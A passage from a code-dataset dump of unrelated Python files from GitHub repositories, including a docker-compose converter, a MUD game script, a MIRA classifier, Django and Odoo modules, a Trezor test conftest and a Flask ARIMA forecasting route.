{command}\".strip()\n return run_command\n\n def get_delete_command(self) -> list:\n \"\"\"This function returns the a list of commands to remove the docker container from your system.\n\n Returns:\n list: Of commands required to remove a running docker contianer.\n\n \"\"\"\n container_name = self._get_container_name()\n stop_command = f\"docker stop {container_name}\"\n remove_command = f\"docker rm {container_name}\"\n return [stop_command, remove_command]\n\n def _parse_ulimits(self, ulimits: dict) -> str:\n \"\"\"For parsing any `ulimits` options with in docker-compose the logic for this is a bit more complicated as\n compared with normal args. 
The key and value parsed can be of any value and they can also define hard & soft\n values.This function will get passed to the `_get_args()` function as `kwargs`.\n\n Example `ulimits` config option below.\n\n ::\n\n {\"nproc\": 65535, \"nofile\": {\"soft\": 20000, \"hard\": 40000}}\n\n Example arguments returned.\n\n ::\n\n --ulimit nproc=65535 --ulimit nofile=20000:40000\n\n Args:\n ulimits (dict): The ulimits config options (see example above).\n\n Returns:\n str: The equivalent cli arguments for docker commands for `ulimits` option in docker-compose.\n\n \"\"\"\n ulimit_args = \"\"\n for name, value in ulimits.items():\n if isinstance(value, dict):\n soft, hard = value[\"soft\"], value[\"hard\"]\n ulimit = f\"--ulimit {name}={soft}:{hard} \"\n else:\n ulimit = f\"--ulimit {name}={value} \"\n ulimit_args += ulimit\n\n return ulimit_args\n\n def _parse_logging(self, logging: dict) -> str:\n \"\"\"For parsing any `logging` options with in docker-compose the logic for this is a bit more complicated as\n compared with normal args. We need to parse the `logging` object. For example it can contain a driving logger\n and then extra logging options where the key and value can be \"anything\". This function will get passed to the\n `_get_args()` function as `kwargs`.\n\n Example `logging` config option below.\n\n ::\n\n {\"driver\": \"json-file\", \"options\": {\"max-size\": \"1k\", \"max-file\": \"3\"}}\n\n\n Example arguments returned.\n\n ::\n\n --log-driver json-file --log-opt max-size=1k --log-opt max-file=3\n\n Args:\n logging (dict): The logging config options (see example above).\n\n Returns:\n str: The equivalent cli arguments for docker commands for `logging` option in docker-compose.\n\n \"\"\"\n logging_args = \"\"\n driver = logging.get(\"driver\", \"\")\n logging_args += f\"--log-driver {driver} \"\n logging_opts = self._get_config_val(config=logging, config_key=\"options\")\n\n for name, value in logging_opts.items():\n logging_args += f\"--log-opt {name}={value} \"\n\n return logging_args\n","repo_name":"hmajid2301/composerisation","sub_path":"src/composerisation/docker_compose/services/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35465492193","text":"from core.module import Module\nfrom collections import deque\n\nclass RefiningModule(Module):\n\n def __init__(self, *args):\n super(RefiningModule, self).__init__(*args)\n\n self.room_queue = deque([])\n self.foci_located = False\n self.searching = False\n self.last_room = 0\n \n foci_definition = {\n \"fun\": self.foci_trigger,\n \"arg\": \"%P1\",\n }\n\n self.state[\"trigger_builder\"].build({\n \"^You detect (\\d+) (lesser|minor) (foci|focus).$\": foci_definition,\n \"^There are a total of \\d+ foci globally\\.$\": self.complete_check,\n \"^You have moved away from your path\\.$\": self.path_fail,\n })\n\n self.state[\"alias_builder\"].build({\n \"startfindfoci\": self.start,\n \"findfoci\": self.find_foci,\n \"resumefoci\": self.resume,\n \"stopfoci\": self.stop,\n })\n\n def foci_trigger(self, num):\n count = int(num)\n if count > 0:\n self.foci_located = True\n\n def complete_check(self):\n if self.foci_located:\n self.mud.info(\"FOCI\")\n self.foci_located = False\n else:\n self.find_foci()\n\n def start(self):\n self.mud.info(\"Starting FOCI search\")\n self.searching = True\n self.load_path_rooms()\n self.find_foci()\n\n def stop(self):\n self.mud.info(\"Stopping FOCI 
search\")\n self.searching = False\n\n def resume(self):\n self.mud.info(\"Resuming FOCI search\")\n self.searching = True\n self.find_foci()\n\n def find_foci(self):\n if not self.room_queue or not self.searching:\n return\n\n self.last_room = self.room_queue.popleft()\n self.mud.info(\"Tracking to %d (%d)\" % (self.last_room, len(self.room_queue)))\n self.mud.eval(\"mq leylines\")\n self.mud.eval(\"q go %d\" % self.last_room)\n\n def path_fail(self):\n if self.last_room:\n self.mud.info(\"Pathing failed, retrying\")\n self.mud.send(\"path track %d\" % self.last_room)\n\n def load_path_rooms(self):\n self.mud.info(\"Loading rooms to queue\")\n rooms = [\n 250, 36824, 20389, 5599, 22477, 22824, 10813, 26690,\n 16437, 18462, 20754, 5682, 21908, 3106, 1745, 12332,\n 20450, 24628, 22702, 23128, 1773, 16706, 17612, 20932,\n 19323, 58675, 3887, 55189, 19621, 17032, 18082, 25408,\n 27704, 13425, 20281, 56942, 54482, 4740, 19320, 20855,\n 23202, 56647, 23791, 19810, 26820, 55276, 19344, 19602,\n 22866, 57334, 19854, 4828, 60845, 19626, 22226, 10046,\n 15714, 3273, 15344, 26920, 14729, 19987, 59609, 2030,\n 16282, 4964, 35217, 56731, 36270, 36677, 38090, 38894,\n 16274, 45483, 49286, 36824, 57521, 54770\n ]\n\n rooms.sort()\n\n self.room_queue = deque(rooms)\n","repo_name":"Xarikins/aetolia-script","sub_path":"refining_module.py","file_name":"refining_module.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17791339378","text":"# mira.py\n# -------\n\n\n# Mira implementation\n\nimport util\nPRINT = True\n\n\nclass MiraClassifier:\n \"\"\"\n Mira classifier.\n\n Note that the variable 'datum' in this code refers to a counter of features\n (not to a raw samples.Datum).\n \"\"\"\n def __init__( self, legalLabels, max_iterations):\n self.legalLabels = legalLabels\n self.type = \"mira\"\n self.automaticTuning = False\n self.C = 0.001\n self.max_iterations = max_iterations\n self.initializeWeightsToZero()\n\n def initializeWeightsToZero(self):\n \"Resets the weights of each label to zero vectors\"\n self.weights = {}\n for label in self.legalLabels:\n self.weights[label] = util.Counter() # this is the data-structure you should use\n\n def train(self, trainingData, trainingLabels, validationData, validationLabels):\n \"Outside shell to call your method. 
Do not modify this method.\"\n\n if (self.automaticTuning):\n Cgrid = [0.002, 0.004, 0.008]\n else:\n Cgrid = [self.C]\n\n return self.trainAndTune(trainingData, trainingLabels, validationData, validationLabels, Cgrid)\n\n \n \n \n def trainAndTune(self, trainingData, trainingLabels, validationData, validationLabels, Cgrid):\n \n \n # DO NOT ZERO OUT YOUR WEIGHTS BEFORE STARTING TRAINING, OR\n # THE AUTOGRADER WILL LIKELY DEDUCT POINTS.\n \n\n self.features = trainingData[0].keys()\n\n newWeights = self.weights.copy()\n self.features = trainingData[0].keys()\n newWeights = self.weights.copy()\n\n bestAccuracy = 0\n correct = 0.0\n\n for c in Cgrid:\n self.weights = newWeights.copy()\n for iteration in range(self.max_iterations):\n print(\"Starting iteration\", iteration, \"...\")\n for datum,trueLabel in zip(trainingData,trainingLabels):\n scores = util.Counter()\n for label in self.legalLabels: scores[label] = self.weights[label] * datum\n guess = scores.argMax()\n if guess != trueLabel:\n dif = self.weights[guess] - self.weights[trueLabel]\n prod = 0 #producto\n sumC = 0 #Suma de los cuadrados\n for feature in self.features:\n prod += datum[feature] * dif[feature]\n sumC += datum[feature]**2\n tau = min(c, (prod + 1.0) / (2.0 * sumC))\n for feature in datum:\n self.weights[trueLabel][feature] += tau * datum[feature]\n self.weights[guess][feature] -= tau * datum[feature]\n else: correct +=1.0\n \n #Calcular la precision\n accuracy = correct / len(validationData)\n if accuracy > bestAccuracy:\n bestAccuracy = accuracy\n bestWeight = self.weights\n\n self.weights = bestWeight\n \n \n \n def classify(self, data ):\n \"\"\"\n Classifies each datum as the label that most closely matches the prototype vector\n for that label. See the project description for details.\n\n Recall that a datum is a util.counter...\n \"\"\"\n \n guesses = []\n #for i in range(len(data)):\n for datum in data:\n scores = util.Counter()\n for label in self.legalLabels:\n scores[label] = self.weights[label] * datum\n guess = scores.argMax()\n guesses.append(guess)\n\n return guesses\n\n\n","repo_name":"Kustonm/IA","sub_path":"classification/mira.py","file_name":"mira.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35228938890","text":"import pickle\n\nclass Persona:\n\n def __init__(self, nombre, genero, edad):\n self.nombre=nombre\n self.genero=genero\n self.edad=edad\n print(\"Persona nueva, de nombre \", self.nombre)\n \n def __str__(self):\n return \"{}{}{}\".format(self.nombre, self.genero, self.edad)\n\nclass ListaPersonas:\n\n personas=[]\n\n def __init__(self):\n listaDePersonas=open(\"ficheroExterno\",\"ab+\")\n listaDePersonas.seek(0)\n\n try:\n self.personas=pickle.load(listaDePersonas)\n print(\"Se cargaron {} personas del fichero externo\".format(len(self.personas)))\n except:\n print(\"El fichero está vacío\")\n finally:\n listaDePersonas.close()\n del(listaDePersonas)\n\n\n def agregarPersonas(self, p):\n self.personas.append(p)\n self.guardarPersonasEnFicheroExterno()\n\n def mostrarPersonas(self):\n for p in self.personas:\n print(p)\n \n def guardarPersonasEnFicheroExterno(self):\n listaDePersonas=open(\"ficheroExterno\",\"wb\")\n pickle.dump(self.personas, listaDePersonas)\n listaDePersonas.close()\n del(listaDePersonas)\n\n def mostrarInfoFicheroExterno(self):\n print(\"La info del fichero externo: \")\n for p in self.personas:\n print(p)\n\n\nmiLista=ListaPersonas()\n\np=Persona(\"Sandra\", 
\"Femenino\",39)\nmiLista.agregarPersonas(p)\np=Persona(\"Antonio\", \"Masculino\",19)\nmiLista.agregarPersonas(p)\np=Persona(\"Ana\", \"Femenino\",29)\nmiLista.agregarPersonas(p)\n\nmiLista.mostrarPersonas()\n\n","repo_name":"aaronperezs/PythonLearning","sub_path":"Python Learning/guardado_permanente.py","file_name":"guardado_permanente.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33436667120","text":"from django.conf.urls import url\nfrom . import views\napp_name = 'epinmain'\nurlpatterns = [\n url(r'^login/$', views.index,name= 'login'),\n url(r'^auth/$', views.auth_detection, name='login'),\n url(r'^signup/$', views.signup, name='signup'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^createaccounts/$', views.createaccounts, name='logout'),\n\n]","repo_name":"WoodProgrammer/gamer_trnet","sub_path":"epin/epinmain/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15337290125","text":"import pandas as pd\nimport numpy as np\n\n# data_range = To create a list\n# periods = Period of time specified\n# 20221201 = yyyy/mm/dd\ndf_pd_datas = pd.date_range(start=\"2024/01/01\", end=\"2024/2/01\", freq=\"D\")\nprint(f\"{df_pd_datas} \\n\\n\")\n\ndf_pd_months = pd.date_range(start=\"2024/01/01\", periods=len(df_pd_datas), freq='M')\nprint(f\"{df_pd_months} \\n\\n\")\n\n\n# The parameters in rand receive respectively the amount of rows and columns\naleatory_numbers = pd.DataFrame(np.random.rand(5, 1))\nprint(f\"{aleatory_numbers} \\n\\n\")\n\n\n# First you need to transform the list into a DataFrame\ndf1 = pd.DataFrame(df_pd_datas)\ndf2 = pd.DataFrame(df_pd_months)\n\nconcat_days_months = pd.concat([df1, df2])\nprint(concat_days_months)\n\n\n# I'm gonna create a DF with two columns\nsuper_df = pd.DataFrame({\n \"Days\": df_pd_datas,\n \"Months\": df_pd_months\n})\n\nprint(f\"\\n\\n{super_df}\")\n","repo_name":"pachecosamuel/Curso-Pandas","sub_path":"DataFrame/aula01.py","file_name":"aula01.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30783985663","text":"from odoo.addons.shopinvader.tests.common import CommonCase\nfrom odoo.addons.shopinvader.tests.test_cart_item import ItemCaseMixin\n\n\nclass ConnectedItemCase(ItemCaseMixin, CommonCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls._setup_products()\n cls.partner = cls.env.ref(\"shopinvader.partner_1\")\n cls.cart = cls.env.ref(\"shopinvader.sale_order_2\")\n cls.pkg_box = cls.env[\"product.packaging\"].create(\n {\n \"name\": \"Box\",\n \"product_id\": cls.product_1.id,\n \"qty\": 50,\n \"barcode\": \"BOX\",\n }\n )\n cls.pkg_big_box = cls.env[\"product.packaging\"].create(\n {\n \"name\": \"Big Box\",\n \"product_id\": cls.product_1.id,\n \"qty\": 200,\n \"barcode\": \"BIGBOX\",\n }\n )\n cls.pkg_pallet = cls.env[\"product.packaging\"].create(\n {\n \"name\": \"Pallet\",\n \"product_id\": cls.product_1.id,\n \"qty\": 2000,\n \"barcode\": \"PALLET\",\n }\n )\n # This module adds new keys: recompute\n cls._refresh_json_data(\n cls, cls.cart.mapped(\"order_line.product_id\") + cls.product_1\n )\n\n def setUp(self):\n super().setUp()\n self.shopinvader_session = {\"cart_id\": self.cart.id}\n with self.work_on_services(\n partner=self.partner, 
shopinvader_session=self.shopinvader_session\n ) as work:\n self.service = work.component(usage=\"cart\")\n\n def test_add_item(self):\n self.remove_cart()\n last_order = self.env[\"sale.order\"].search([], limit=1, order=\"id desc\")\n # TODO: in theory we should be able to skip prod qty\n # since it's computed in `sale_order_line_packaging_qty `\n cart = self.add_item(\n self.product_1.id,\n 1,\n packaging_id=self.pkg_pallet,\n packaging_qty=2.0,\n )\n self.assertGreater(cart[\"id\"], last_order.id)\n self.assertEqual(len(cart[\"lines\"][\"items\"]), 1)\n self.assertEqual(cart[\"lines\"][\"count\"], 4000)\n cart_line = cart[\"lines\"][\"items\"][0]\n # check SO line values\n line = self.env[\"sale.order.line\"].browse(cart_line[\"id\"])\n self.assertEqual(line.product_packaging, self.pkg_pallet)\n self.assertEqual(line.product_packaging_qty, 2.0)\n self.assertEqual(line.product_uom_qty, 4000)\n # Check cart line values\n self.check_product_and_qty(cart_line, self.product_1.id, 4000)\n self.assertEqual(\n cart_line[\"packaging\"],\n {\n \"id\": self.pkg_pallet.id,\n \"name\": self.pkg_pallet.packaging_type_id.name,\n \"code\": self.pkg_pallet.packaging_type_id.code,\n \"barcode\": self.pkg_pallet.barcode,\n },\n )\n self.assertEqual(cart_line[\"packaging_qty\"], 2)\n self.assertIn(\"sell_only_by_packaging\", cart_line[\"product\"])\n\n def test_update_item(self):\n line = self.cart.order_line[0]\n product = line.product_id\n cart = self.update_item(\n line.id, 1, packaging_id=self.pkg_pallet, packaging_qty=3.0\n )\n # check SO line values\n self.assertEqual(line.product_packaging, self.pkg_pallet)\n self.assertEqual(line.product_packaging_qty, 3.0)\n self.assertEqual(line.product_uom_qty, 6000)\n # Check cart line values\n cart_line = [x for x in cart[\"lines\"][\"items\"] if x[\"id\"] == line.id][0]\n self.check_product_and_qty(cart_line, product.id, 6000)\n self.assertEqual(\n cart_line[\"packaging\"],\n {\n \"id\": self.pkg_pallet.id,\n \"name\": self.pkg_pallet.packaging_type_id.name,\n \"code\": self.pkg_pallet.packaging_type_id.code,\n \"barcode\": self.pkg_pallet.barcode,\n },\n )\n self.assertEqual(cart_line[\"packaging_qty\"], 3.0)\n self.assertIn(\"sell_only_by_packaging\", cart_line[\"product\"])\n\n def test_copy_line(self):\n line = self.cart.order_line[0]\n product = line.product_id\n line.write(\n {\n \"product_packaging\": self.pkg_pallet.id,\n \"product_packaging_qty\": 4.0,\n }\n )\n self.assertEqual(line.product_uom_qty, 8000)\n cart = self.extract_cart(\n self.service.dispatch(\"copy\", params={\"id\": self.cart.id})\n )\n cart_line = [\n x for x in cart[\"lines\"][\"items\"] if x[\"product\"][\"id\"] == product.id\n ][0]\n self.assertIn(\"sell_only_by_packaging\", cart_line[\"product\"])\n self.check_product_and_qty(cart_line, product.id, 8000)\n # Check cart line values\n self.assertEqual(\n cart_line[\"packaging\"],\n {\n \"id\": self.pkg_pallet.id,\n \"name\": self.pkg_pallet.packaging_type_id.name,\n \"code\": self.pkg_pallet.packaging_type_id.code,\n \"barcode\": self.pkg_pallet.barcode,\n },\n )\n self.assertEqual(cart_line[\"packaging_qty\"], 4.0)\n # check SO line values\n line = self.env[\"sale.order.line\"].browse(cart_line[\"id\"])\n self.assertEqual(line.product_packaging, self.pkg_pallet)\n self.assertEqual(line.product_packaging_qty, 4.0)\n self.assertEqual(line.product_uom_qty, 8000)\n\n # TODO: add tests for packaging 
computation\n","repo_name":"shopinvader/odoo-shopinvader","sub_path":"shopinvader_sale_packaging/tests/test_cart.py","file_name":"test_cart.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"81"} +{"seq_id":"14745151095","text":"\"\"\"Packaging settings.\"\"\"\n\nfrom setuptools import setup\nfrom codecs import open\nfrom os import path\nfrom dunkirk import __version__\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name = 'dunkirk',\n version = __version__,\n description = 'Export all your Apple iCloud Notes to text files',\n long_decription = long_description,\n long_description_content_type = 'text/markdown',\n url = 'https://github.com/filfreire/dunkirk',\n author = 'Filipe Freire',\n author_email = 'livrofubia@gmail.com',\n license = 'MIT',\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: End Users/Desktop',\n 'Topic :: Utilities',\n 'Natural Language :: English',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ],\n keywords = 'apple icloud notes text files',\n entry_points = {\n 'console_scripts': ['dunkirk = dunkirk.dunkirk:main']\n },\n packages = ['dunkirk'],\n install_requires = [\n 'biplist >= 1.0.3',\n 'beautifulsoup4 >= 4.6.0',\n 'docopt >= 0.6.2'\n ],\n)\n","repo_name":"filfreire/dunkirk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"39686812356","text":"import pandas as pd\nimport os\nimport numpy as np\nfolder_path = '/Users/user/Desktop/200/saved_files/Grouping Patients/'\nsave_path = '/Users/user/Desktop/200/saved_files/Grouping Patients/'\n\n\nfor i in range(1,6):\n data = np.zeros((18, 14))\n if i==4:\n continue\n group_path = folder_path + 'DG' + str(i) + '/'\n data_dirlist = os.listdir(group_path)\n for index in data_dirlist:\n read_file = pd.read_csv(group_path + index, header = None).iloc[1:, 1:]\n data += read_file\n data /= len(data_dirlist)\n output_data = pd.DataFrame(data)\n output_data.to_csv(save_path + 'DG' + str(i) + ' Matrix.csv')\n","repo_name":"tanyaniazi/ITU-Markovian_Dynamic_programming-HW","sub_path":"grouping_diseases.py","file_name":"grouping_diseases.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4812635537","text":"import functools\nimport os\n\nimport pytest\n\nfrom trezorlib import debuglink, log\nfrom trezorlib.debuglink import TrezorClientDebugLink\nfrom trezorlib.device import wipe as wipe_device\nfrom trezorlib.transport import enumerate_devices, get_transport\n\nTREZOR_VERSION = None\n\n\ndef get_device():\n path = os.environ.get(\"TREZOR_PATH\")\n if path:\n transport = get_transport(path)\n else:\n devices = enumerate_devices()\n for device in devices:\n if hasattr(device, \"find_debug\"):\n transport = device\n break\n else:\n raise RuntimeError(\"No debuggable device found\")\n env_interactive = int(os.environ.get(\"INTERACT\", 0))\n try:\n return TrezorClientDebugLink(transport, auto_interact=not env_interactive)\n except Exception as e:\n 
raise RuntimeError(\n \"Failed to open debuglink for {}\".format(transport.get_path())\n ) from e\n\n\ndef device_version():\n client = get_device()\n if client.features.model == \"T\":\n return 2\n else:\n return 1\n\n\n@pytest.fixture(scope=\"function\")\ndef client():\n client = get_device()\n wipe_device(client)\n\n client.open()\n yield client\n client.close()\n\n\ndef setup_client(mnemonic=None, pin=\"\", passphrase=False):\n if mnemonic is None:\n mnemonic = \" \".join([\"all\"] * 12)\n if pin is True:\n pin = \"1234\"\n\n def client_decorator(function):\n @functools.wraps(function)\n def wrapper(client, *args, **kwargs):\n debuglink.load_device_by_mnemonic(\n client,\n mnemonic=mnemonic,\n pin=pin,\n passphrase_protection=passphrase,\n label=\"test\",\n language=\"english\",\n )\n return function(client, *args, **kwargs)\n\n return wrapper\n\n return client_decorator\n\n\ndef pytest_configure(config):\n # try to figure out trezor version\n global TREZOR_VERSION\n try:\n TREZOR_VERSION = device_version()\n except Exception:\n pass\n\n # register known markers\n config.addinivalue_line(\"markers\", \"skip_t1: skip the test on Trezor One\")\n config.addinivalue_line(\"markers\", \"skip_t2: skip the test on Trezor T\")\n with open(os.path.join(os.path.dirname(__file__), \"REGISTERED_MARKERS\")) as f:\n for line in f:\n config.addinivalue_line(\"markers\", line.strip())\n\n # enable debug\n if config.getoption(\"verbose\"):\n log.enable_debug_output()\n\n\ndef pytest_runtest_setup(item):\n \"\"\"\n Called for each test item (class, individual tests).\n\n Performs custom processing, mainly useful for trezor CI testing:\n * 'skip_t2' tests are skipped on T2 and 'skip_t1' tests are skipped on T1.\n * no test should have both skips at the same time\n \"\"\"\n if TREZOR_VERSION is None:\n pytest.fail(\"No debuggable Trezor is available\")\n\n if item.get_closest_marker(\"skip_t1\") and item.get_closest_marker(\"skip_t2\"):\n pytest.fail(\"Don't skip tests for both trezors!\")\n\n if item.get_closest_marker(\"skip_t2\") and TREZOR_VERSION == 2:\n pytest.skip(\"Test excluded on Trezor T\")\n if item.get_closest_marker(\"skip_t1\") and TREZOR_VERSION == 1:\n pytest.skip(\"Test excluded on Trezor 1\")\n","repo_name":"mollaf/trezor-firmware","sub_path":"python/trezorlib/tests/device_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"5144818169","text":"from dal import autocomplete\nfrom django import forms\n\nfrom core.models import Location\nfrom .models import Subscriber\n\n\nclass SubscriberForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(SubscriberForm, self).__init__(*args, **kwargs)\n self.fields['email'].widget.attrs.update(placeholder='Email address')\n self.fields['user_location'].label = \"Location\"\n\n user_location = forms.ModelChoiceField(\n queryset=Location.objects.all(),\n widget=autocomplete.ModelSelect2(url='location-autocomplete'),\n )\n\n class Meta:\n model = Subscriber\n fields = ('email', 'user_location',)\n","repo_name":"catoa/weather-app","sub_path":"subscribers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37430004580","text":"from flask import Blueprint\nfrom flask import current_app as app\nfrom middleware.middleware import auth\nfrom pandas import read_csv\nfrom matplotlib 
import pyplot\nfrom statsmodels.graphics.tsaplots import plot_pacf, plot_acf\nfrom statsmodels.tsa.arima_model import ARIMA\nimport statsmodels.api as sm\nimport pandas as pd\nimport time\nimport threading\nimport os\nfrom sklearn.metrics import mean_squared_error\ntimeSeries_bp = Blueprint('timeSeries_bp', __name__)\n\n\ndef updateTestAndTrain():\n global train\n global test\n global value\n while(True):\n time.sleep(value)\n dataRow = test.head(1)\n train = pd.concat([train, dataRow], axis=0).reset_index(drop=True)\n test = test.iloc[1:]\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nForeign_Exchange_Rates = pd.read_csv(dir_path + \"/dataset.csv\")\ndf = Foreign_Exchange_Rates[['Time Serie',\n 'AUSTRALIA - AUSTRALIAN DOLLAR/US$']]\ngdf = df[df['AUSTRALIA - AUSTRALIAN DOLLAR/US$'] == 'ND']\ndf = pd.concat([df, gdf, gdf]).drop_duplicates(keep=False)\ndf = df.reset_index(drop=True)\n#plot_pacf(df['AUSTRALIA - AUSTRALIAN DOLLAR/US$'], lags=5)\n#plot_acf(df['AUSTRALIA - AUSTRALIAN DOLLAR/US$'],lags=3000)\ndf.rename(columns={'Time Serie': 'index'}, inplace=True)\ndf.rename(columns={'AUSTRALIA - AUSTRALIAN DOLLAR/US$': 'value'}, inplace=True)\ndf = pd.DataFrame(df.value.astype(float))\nX = df.value\nsize = int(len(X) * 0.66)\ntrain, test = X[0:size], X[size:len(X)]\nvalue = 300\nt1 = threading.Thread(target=updateTestAndTrain, args=())\nt1.start()\n\n\n# List products with their information\n# (Inforamtion passed from client - items to skip)\n@timeSeries_bp.route('/api/predict/', methods=['GET'])\n@auth\ndef predict(flag):\n global train\n history = [x for x in train]\n model = ARIMA(history, order=(1, 0, 0))\n model_fit = model.fit(disp=0)\n if(flag == '0'):\n output = model_fit.forecast()\n yhat = output[0]\n yhat = str(yhat)\n return yhat, 200\n\n elif(flag == '1'):\n output = model_fit.forecast(7)\n yhat = output[0]\n yhat = str(yhat)\n return yhat, 200\n\n elif(flag == '2'):\n output = model_fit.forecast(30)\n yhat = output[0]\n yhat = str(yhat)\n return yhat, 200\n\n else:\n s = 'please check the flag value given'\n return s, 200\n","repo_name":"Ishar-Menon/tokenizer","sub_path":"server/timeSeriesAnalysis/timeSeriesAnalysis_routes.py","file_name":"timeSeriesAnalysis_routes.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37998315412","text":"\"\"\"\nMeta features designing for binary classification tasks \n in the pool based active learning scenario.\n\"\"\"\nimport os\nimport h5py\nimport numpy as np \n\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import Normalizer,minmax_scale\nfrom sklearn.utils.validation import check_array\nfrom sklearn.datasets import make_classification\nfrom sklearn.svm import SVC\n\nfrom model import naive_bayes_classifier, knn_classifier, logistic_regression_classifier, \\\n random_forest_classifier, decision_tree_classifier, svm_classifier, svm_cross_validation, gradient_boosting_classifier\n\nclassifiers = {'NB':naive_bayes_classifier, \n 'KNN':knn_classifier, \n 'LR':logistic_regression_classifier, \n 'RF':random_forest_classifier, \n 'DT':decision_tree_classifier, \n 'SVM':svm_classifier, \n 'SVMCV':svm_cross_validation, \n 'GBDT':gradient_boosting_classifier \n}\n\ndef randperm(n, k=None):\n \"\"\"Generate a random array which contains k elements range from (n[0]:n[1])\n\n Parameters\n ----------\n n: int or tuple\n range from [n[0]:n[1]], include n[0] and n[1].\n if an int 
is given, then n[0] = 0\n\n k: int, optional (default=end - start + 1)\n how many numbers will be generated. should not larger than n[1]-n[0]+1,\n default=n[1] - n[0] + 1.\n\n Returns\n -------\n perm: list\n the generated array.\n \"\"\"\n if isinstance(n, np.generic):\n n = np.asscalar(n)\n if isinstance(n, tuple):\n if n[0] is not None:\n start = n[0]\n else:\n start = 0\n end = n[1]\n elif isinstance(n, int):\n start = 0\n end = n\n else:\n raise TypeError(\"n must be tuple or int.\")\n\n if k is None:\n k = end - start + 1\n if not isinstance(k, int):\n raise TypeError(\"k must be an int.\")\n if k > end - start + 1:\n raise ValueError(\"k should not larger than n[1]-n[0]+1\")\n\n randarr = np.arange(start, end + 1)\n np.random.shuffle(randarr)\n return randarr[0:k]\n\nclass DataSet():\n \"\"\"\n\n Parameters\n ----------\n X: 2D array, optional (default=None) [n_samples, n_features]\n Feature matrix of the whole dataset. It is a reference which will not use additional memory.\n\n y: array-like, optional (default=None) [n_samples]\n Label matrix of the whole dataset. It is a reference which will not use additional memory.\n \n \"\"\"\n def __init__(self, dataset_name, dataset_path=None, X=None, y=None): \n self.dataset_name = dataset_name\n if dataset_path:\n self.get_dataset(dataset_path)\n elif (X is not None) and (y is not None) :\n self.X = X\n self.y = y\n else:\n raise ValueError(\"Please input dataset_path or X, y\")\n self.n_samples, self.n_features = np.shape(self.X)\n self.distance = None\n \n def get_dataset(self, dataset_path):\n \"\"\"\n Get the dataset by name.\n The dataset format is *.mat.\n \"\"\"\n filename = dataset_path + self.dataset_name +'.mat'\n dt = h5py.File(filename, 'r')\n self.X = np.transpose(dt['x'])\n self.y = np.transpose(dt['y'])\n \n def get_cluster_center(self, n_clusters=10, method='Euclidean'):\n \"\"\"Use the Kmeans in sklearn to get the cluster centers.\n\n Parameters\n ----------\n n_clusters: int \n The number of cluster centers.\n Returns\n -------\n data_cluster_centers: np.ndarray\n The samples in origin dataset X is the closest to the cluster_centers.\n index_cluster_centers: np.ndarray\n The index corresponding to the samples in origin data set. 
\n \"\"\"\n # if self.distance is None:\n # self.get_distance()\n data_cluster = KMeans(n_clusters=n_clusters, random_state=0).fit(self.X)\n data_origin_cluster_centers = data_cluster.cluster_centers_\n closest_distance_data_cluster_centers = np.zeros(n_clusters) + np.infty\n index_cluster_centers = np.zeros(n_clusters, dtype=int) - 1\n \n # obtain the cluster centers index\n for i in range(self.n_samples):\n for j in range(n_clusters):\n if method == 'Euclidean':\n distance = np.linalg.norm(self.X[i] - data_origin_cluster_centers[j])\n if distance < closest_distance_data_cluster_centers[j]:\n closest_distance_data_cluster_centers[j] = distance\n index_cluster_centers[j] = i\n\n if(np.any(index_cluster_centers == -1)):\n raise IndexError(\"data_cluster_centers_index is wrong\")\n\n return self.X[index_cluster_centers], index_cluster_centers\n\n def get_distance(self, method='Euclidean'):\n \"\"\"\n\n Parameters\n ----------\n method: str\n The method calculate the distance.\n Returns\n -------\n distance_martix: 2D\n D[i][j] reprensts the distance between X[i] and X[j].\n \"\"\"\n if self.n_samples == 1:\n raise ValueError(\"There is only one sample.\")\n \n distance = np.zeros((self.n_samples, self.n_samples))\n for i in range(1, self.n_samples):\n for j in range(i+1, self.n_samples):\n if method == 'Euclidean':\n distance[i][j] = np.linalg.norm(self.X[i] - self.X[j])\n \n self.distance = distance + distance.T\n return self.distance\n \n def split_data(self, test_ratio=0.3, initial_label_rate=0.05, split_count=10, 